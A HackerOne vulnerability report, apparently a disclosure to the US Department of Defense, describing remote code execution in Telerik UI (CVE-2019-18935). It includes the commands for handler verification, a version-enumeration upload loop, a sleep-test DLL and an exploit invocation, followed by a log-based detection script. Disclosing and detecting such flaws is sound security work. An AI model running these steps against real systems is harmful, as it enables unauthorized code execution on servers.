HackerOne (un4gi) H1:1174185
History: Apr 25, 2021 - 9:38 a.m.

U.S. Dept Of Defense: Remote Code Execution via Insecure Deserialization in Telerik UI (CVE-2019-18935)

2021-04-25 09:38:03 | un4gi | hackerone.com

9.8 High (CVSS3)
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.5 High (CVSS2)
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P

0.908 High (EPSS)
Percentile: 98.3%

Description:
https://██████/██████████/Telerik.Web.UI.WebResource.axd?type=rau is vulnerable to CVE-2017-11317 and CVE-2019-18935, allowing an attacker to upload arbitrary files and gain remote code execution on the underlying system.

References

https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui

Impact

An attacker can execute code on the vulnerable server, allowing an attacker to gain a foothold and exfiltrate data. Depending on the security posture of the underlying system, an attacker may be able to escalate privileges or laterally move to other systems within the network using this access.

System Host(s)

████

Affected Product(s) and Version(s)

Telerik UI Version ███

CVE Numbers

CVE-2017-11317, CVE-2019-18935

Steps to Reproduce

Verify the Upload Handler is Registered

First, confirm the file upload handler is registered by issuing the following request:

curl -sk https://██████████/██████████/Telerik.Web.UI.WebResource.axd?type=rau

You should see the following response:

{ "message" : "RadAsyncUpload handler is registered succesfully, however, it may not be accessed directly." }

Version Identification

Next, install RAU_crypto (https://github.com/bao7uo/RAU_crypto) and use it to submit upload requests with known vulnerable version strings until one is accepted, which identifies the version in use. After RAU_crypto has been installed, you can use the following script (with the attached versions.txt file):

echo 'test' > testfile.txt
for VERSION in $(cat versions.txt); do
    echo -n "$VERSION: "
    python3 RAU_crypto.py -P '█████' "$VERSION" testfile.txt https://█████████/█████/Telerik.Web.UI.WebResource.axd?type=rau 2>/dev/null | grep fileInfo || echo
done

This uploads a file (in this case, testfile.txt) to the █████ directory on the target server. The contents of my testfile.txt simply included the word “test”.

The script should eventually identify a vulnerable version (████████), indicating the file upload succeeded and showing an encrypted blob of data related to the uploaded file:

█████████: {"fileInfo":{"FileName":"RAU_crypto.bypass","ContentType":"text/html","ContentLength":5,"DateJson":█████ }

Compiling a Test Payload

Now that we know we can upload a file to the target, we can attempt to exploit the deserialization vulnerability. To do this, we can compile and upload a DLL that causes the server to sleep for 10 seconds before responding:

#include <windows.h>
#include <stdio.h>

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
    if (fdwReason == DLL_PROCESS_ATTACH)
        Sleep(10000);  // Time interval in milliseconds.
    return TRUE;
}

Because a .NET application will only load an assembly with a given name once, the DLL from my test will only successfully sleep the server on the first exploit. I have compiled and attached an unused DLL for testing purposes if desired (if not, just follow the steps from the link in the References section).

Exploitation

Now that we have our test payload ready, we can use the attached CVE-2019-18935.py script to upload and execute the dll.

python3 CVE-2019-18935.py -u https://███████/███/Telerik.Web.UI.WebResource.axd?type=rau -v ██████████ -f '███' -p sleep_2020070207013954_amd64.dll

> Note: I’m having trouble getting the server to sleep with the crafted .dll. The files are getting uploaded, but do not seem to be causing the server to sleep as expected. It is 02:30 AM here at the moment so I am heading to bed but will update tomorrow with more info in the comments, and will end up self closing if I can’t get execution.

Suggested Mitigation/Remediation Actions

Update Telerik UI to the latest (or a patched) version.
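As an added example (not part of the original report), a defender-side check that runs over IIS W3C log lines and flags the traffic pattern the reproduction steps above produce: a run of POSTs to the RadAsyncUpload handler from one client (the version-enumeration loop) and an upload whose response took around 10 s (the sleep payload). The log excerpt is constructed; the field names and order are assumed to follow the IIS '#Fields:' directive as shown.

```python
from collections import defaultdict
from datetime import datetime

# Constructed IIS W3C log excerpt (not real traffic); the handler path, the
# type=rau query and the run of POSTs mirror the report's reproduction steps.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status time-taken
2021-04-25 09:30:01 GET /app/default.aspx - 198.51.100.7 200 15
2021-04-25 09:30:12 GET /app/Telerik.Web.UI.WebResource.axd type=rau 203.0.113.9 200 4
2021-04-25 09:30:20 POST /app/Telerik.Web.UI.WebResource.axd type=rau 203.0.113.9 200 31
2021-04-25 09:30:21 POST /app/Telerik.Web.UI.WebResource.axd type=rau 203.0.113.9 200 28
2021-04-25 09:30:22 POST /app/Telerik.Web.UI.WebResource.axd type=rau 203.0.113.9 200 30
2021-04-25 09:30:23 POST /app/Telerik.Web.UI.WebResource.axd type=rau 203.0.113.9 200 29
2021-04-25 09:31:05 POST /app/Telerik.Web.UI.WebResource.axd type=rau 203.0.113.9 200 10042
2021-04-25 09:35:00 POST /app/Telerik.Web.UI.WebResource.axd type=rau 198.51.100.7 200 27
"""

HANDLER = "telerik.web.ui.webresource.axd"

def parse_iis_w3c(text):
    """Yield one dict per entry, keyed by the names in the '#Fields:' directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            parts = line.split()
            if len(parts) == len(fields):  # skip malformed lines rather than misalign
                yield dict(zip(fields, parts))

def analyze_rau(text, window_seconds=60, burst_threshold=4, slow_ms=10000):
    """Return {'bursts': {ip: peak POSTs in window}, 'slow': [(ip, time-taken)]}.
    A run of uploads matches the version-enumeration loop; a POST taking
    >= slow_ms is consistent with the 10 s sleep payload having been loaded."""
    posts, slow = defaultdict(list), []
    for e in parse_iis_w3c(text):
        stem, query = e["cs-uri-stem"].lower(), e["cs-uri-query"].lower()
        if not (stem.endswith(HANDLER) and "type=rau" in query and e["cs-method"] == "POST"):
            continue
        posts[e["c-ip"]].append(datetime.fromisoformat(f"{e['date']} {e['time']}"))
        if int(e["time-taken"]) >= slow_ms:
            slow.append((e["c-ip"], int(e["time-taken"])))
    bursts = {}
    for ip, times in posts.items():
        peak = max(sum(1 for t in times if 0 <= (t - s).total_seconds() <= window_seconds)
                   for s in times)
        if peak >= burst_threshold:
            bursts[ip] = peak
    return {"bursts": bursts, "slow": slow}
```

Any hit on the handler at all is worth alerting on when the application does not use RadAsyncUpload; the burst and time-taken thresholds are starting points to tune against normal upload traffic.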
